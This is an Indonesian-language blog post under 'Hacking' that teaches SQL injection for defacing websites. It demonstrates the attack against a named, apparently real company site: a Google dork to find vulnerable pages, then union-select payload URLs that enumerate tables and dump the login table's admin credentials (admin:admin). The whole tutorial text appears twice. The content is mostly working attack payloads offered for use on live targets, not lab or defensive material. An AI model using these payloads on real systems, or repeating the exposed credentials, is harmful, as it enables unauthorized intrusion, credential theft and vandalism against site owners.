09.11
Unknown
Sebelum men daface sebuah situs, kita bisa menggunakan dork sql injectiondengan bantuan om kita semua ( om google )
inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"
trus yg saya dapat :http://www.geic.co.id/detailproduct.php?id=75
untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang urlhttp://www.geic.co.id/detailproduct.php?id=75'
ternyata ada bug-nya, muncul pesan error :You have an error in your SQL syntax; check the manual that corresponds to yourMySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1
Untuk mencari column gunakan perintah [order by]http://www.geic.co.id/detailproduct.php?id=75 order by 1--
dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 19http://www.geic.co.id/detailproduct.php?id=75 order by 19--
muncul pesan error:Unknown column '19' in 'order clause'
jadi angka yang diambil adalah 19-1 = 18 (jumlah column adalah 18)
Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah "union all select"http://www.geic.co.id/detailproduct.php?id=-75 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 75
akan muncul "angka ajaib" : 3, 11 dan 18kita pilih salah satunya saja, misal 3
trus kita ceri versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 3http://www.geic.co.id/detailproduct.php?id=-75 union all select1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
muncul tulisan :5.0.90-communitywewww...ternyata versi 5, klo versi 4 sy angkat tangan.....wkwkwkwk :pnb : lebih mudah versi 5, karena sebentar kita akan mencari informasi table dancolumn dari information_schema, dimana information_schema tidak terdapat pada database MySql versi 4.Jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitumenebak-nebak tablenya... lol
Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaibdan "+from+information_schema.tables+where+table_schema=database()--" dibelakang angka 18http://www.geic.co.id/detailproduct.php?id=-75 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where+
akan muncul nama-nama table :login,tbanner,tcatprod,tproduct,tset
Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,kali ini kita ambil table "login"sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :http://www.piclist.com/techref/ascii.htm ketik : loginpilih ASCII to Hexhasilnya : 6c6f67696e
Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 3 dan"+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL
ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696etambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexahttp://www.geic.co.id/detailproduct.php?id=-75 union all select1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.column
muncul column : user,passwkwkwkkw....
untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 3dan +from+NAMATABLE-- pada akhir URL
ganti column 1 dengan "user" dan column2 dengan "pass"0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexaNAMA TABLE diganti dengan "login" untuk mengambil informasi dari table yang bernama"login"http://www.geic.co.id/detailproduct.php?id=-75 union all select1,2,group_concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login--
hasil : admin:adminjadi,user = adminpassword = admin
inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"
trus yg saya dapat :http://www.geic.co.id/detailproduct.php?id=75
untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang urlhttp://www.geic.co.id/detailproduct.php?id=75'
ternyata ada bug-nya, muncul pesan error :You have an error in your SQL syntax; check the manual that corresponds to yourMySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1
Untuk mencari column gunakan perintah [order by]http://www.geic.co.id/detailproduct.php?id=75 order by 1--
dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 19http://www.geic.co.id/detailproduct.php?id=75 order by 19--
muncul pesan error:Unknown column '19' in 'order clause'
jadi angka yang diambil adalah 19-1 = 18 (jumlah column adalah 18)
Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah "union all select"http://www.geic.co.id/detailproduct.php?id=-75 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 75
akan muncul "angka ajaib" : 3, 11 dan 18kita pilih salah satunya saja, misal 3
trus kita ceri versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 3http://www.geic.co.id/detailproduct.php?id=-75 union all select1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
muncul tulisan :5.0.90-communitywewww...ternyata versi 5, klo versi 4 sy angkat tangan.....wkwkwkwk :pnb : lebih mudah versi 5, karena sebentar kita akan mencari informasi table dancolumn dari information_schema, dimana information_schema tidak terdapat pada database MySql versi 4.Jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitumenebak-nebak tablenya... lol
Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaibdan "+from+information_schema.tables+where+table_schema=database()--" dibelakang angka 18http://www.geic.co.id/detailproduct.php?id=-75 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where+
akan muncul nama-nama table :login,tbanner,tcatprod,tproduct,tset
Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,kali ini kita ambil table "login"sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :http://www.piclist.com/techref/ascii.htm ketik : loginpilih ASCII to Hexhasilnya : 6c6f67696e
Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 3 dan"+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL
ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696etambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexahttp://www.geic.co.id/detailproduct.php?id=-75 union all select1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.column
muncul column : user,passwkwkwkkw....
untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 3dan +from+NAMATABLE-- pada akhir URL
ganti column 1 dengan "user" dan column2 dengan "pass"0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexaNAMA TABLE diganti dengan "login" untuk mengambil informasi dari table yang bernama"login"http://www.geic.co.id/detailproduct.php?id=-75 union all select1,2,group_concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login--
hasil : admin:adminjadi,user = adminpassword = admin
Posted in: Hacking
0 komentar:
Posting Komentar